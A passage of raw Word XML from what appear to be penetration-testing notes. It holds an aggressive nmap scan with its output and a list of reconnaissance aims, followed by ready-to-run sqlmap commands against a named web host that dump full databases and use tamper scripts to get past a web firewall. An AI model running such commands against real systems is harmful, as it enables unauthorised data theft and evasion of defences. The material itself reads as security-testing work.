          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve">Command:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>nmap  -A  -T4  192.168.247.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6BB1F8" w14:textId="77777777" w:rsidR="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33525B2A" w14:textId="4BC4A31E" w:rsidR="00615BFE" w:rsidRPr="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve">:     </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Port: 53/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252788D1" w14:textId="77777777" w:rsidR="00615BFE" w:rsidRPr="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       STATE: Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22940635" w14:textId="77777777" w:rsidR="00615BFE" w:rsidRPr="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       Service: Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269BB9D4" w14:textId="3A757865" w:rsidR="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       Version: dnsmasq 2.87   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425364EB" w14:textId="5B64DC8F" w:rsidR="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C635FEB" w14:textId="48033A6B" w:rsidR="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>MAC Address: 00:50:56:FA:CA:FC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D941705" w14:textId="49D35C71" w:rsidR="00615BFE" w:rsidRPr="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Aggressive OS guesses: VMware Player virtual NAT device (99%), </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">                       </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>(93%), DD-WRT v24-sp2 (Linux 2.4.37) (91%), Microsoft Windows XP SP3 (91%), Actiontec MI424WR-GEN3I WAP (90%), DVTel DVT-9540DW network camera (89%), Linux 3.2 (89%), Linux 4.4 (89%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0543C1DC" w14:textId="77777777" w:rsidR="00615BFE" w:rsidRPr="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>No exact OS matches for host (test conditions non-ideal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1370BA64" w14:textId="77777777" w:rsidR="00615BFE" w:rsidRPr="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Network Distance: 1 hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AB3AE9" w14:textId="77777777" w:rsidR="00615BFE" w:rsidRPr="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51FFD968" w14:textId="77777777" w:rsidR="00615BFE" w:rsidRPr="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
        <w:t>TRACEROUTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F443FAC" w14:textId="4C86499D" w:rsidR="00615BFE" w:rsidRPr="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">HOP </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">RTT     </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584BA1F8" w14:textId="56C2FB4D" w:rsidR="00615BFE" w:rsidRPr="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">1  </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">1.15 ms </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>192.168.247.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73193E6E" w14:textId="785CDEB8" w:rsidR="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA467CE" w14:textId="5FB370AB" w:rsidR="00917FD2" w:rsidRDefault="00917FD2" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00917FD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">Reason: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9B3E5E" w14:textId="77777777" w:rsidR="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49AA271A" w14:textId="77777777" w:rsidR="00040DB4" w:rsidRPr="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00040DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Initial Reconnaissance – Quickly gather system details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAAE138" w14:textId="77777777" w:rsidR="00040DB4" w:rsidRPr="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00040DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Enumerating Open Ports &amp; Services – Find vulnerable services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798EF3D6" w14:textId="77777777" w:rsidR="00040DB4" w:rsidRPr="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00040DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Testing Firewalls &amp; IDS Detection – See if aggressive scanning gets blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA3A992" w14:textId="7C2D586B" w:rsidR="00040DB4" w:rsidRPr="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00040DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Finding Exploit Paths – OS &amp; service versions help map attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6F161" w14:textId="77777777" w:rsidR="00917FD2" w:rsidRPr="00040DB4" w:rsidRDefault="00917FD2" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="426A4AC0" w14:textId="77777777" w:rsidR="00917FD2" w:rsidRDefault="00917FD2" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32236B09" w14:textId="0BC74B5F" w:rsidR="00615BFE" w:rsidRPr="00917FD2" w:rsidRDefault="00917FD2" w:rsidP="00917FD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00917FD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00917FD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FFF3C4" w14:textId="77777777" w:rsidR="00917FD2" w:rsidRPr="00917FD2" w:rsidRDefault="00917FD2" w:rsidP="00917FD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00917FD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AA9DAF" w14:textId="77777777" w:rsidR="00606EBF" w:rsidRDefault="00606EBF" w:rsidP="00917FD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E19EF2" w14:textId="2861B391" w:rsidR="00606EBF" w:rsidRDefault="00606EBF" w:rsidP="00606EBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Identify Vulnerable Parameters Automatically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0EDD68" w14:textId="69DC5B62" w:rsidR="00917FD2" w:rsidRPr="00606EBF" w:rsidRDefault="00917FD2" w:rsidP="00917FD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">u </w:t>
      </w:r>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"https://testing.pinewheel.ai/login?username=admin&amp;password=pass" --dbs --batch --level=5 --risk=3 --tamper=between,randomcase --random-agent --threads=10 </w:t>
      </w:r>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--flush-session </w:t>
      </w:r>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--dump-all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758C167" w14:textId="6A8E48B8" w:rsidR="00917FD2" w:rsidRDefault="00606EBF" w:rsidP="00917FD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A45E10" w14:textId="77777777" w:rsidR="00606EBF" w:rsidRDefault="00606EBF" w:rsidP="00917FD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A36A31" w14:textId="77777777" w:rsidR="00606EBF" w:rsidRDefault="00606EBF" w:rsidP="00917FD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38241C5C" w14:textId="77777777" w:rsidR="00606EBF" w:rsidRDefault="00606EBF" w:rsidP="00917FD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C4C9DF1" w14:textId="1F4DF8F4" w:rsidR="00606EBF" w:rsidRDefault="00606EBF" w:rsidP="00606EBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dump Full Database &amp; Bypass WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B331BFA" w14:textId="77777777" w:rsidR="00606EBF" w:rsidRPr="00606EBF" w:rsidRDefault="00606EBF" w:rsidP="00606EBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA54314" w14:textId="15726AF7" w:rsidR="00917FD2" w:rsidRPr="00606EBF" w:rsidRDefault="00606EBF" w:rsidP="00917FD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sqlmap -u "https://testing.pinewheel.ai/products?id=5" --dump --tamper=space2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>comment,charencode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00606EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> --level=5 --risk=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B15261" w14:textId="77777777" w:rsidR="00606EBF" w:rsidRDefault="00606EBF" w:rsidP="00917FD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
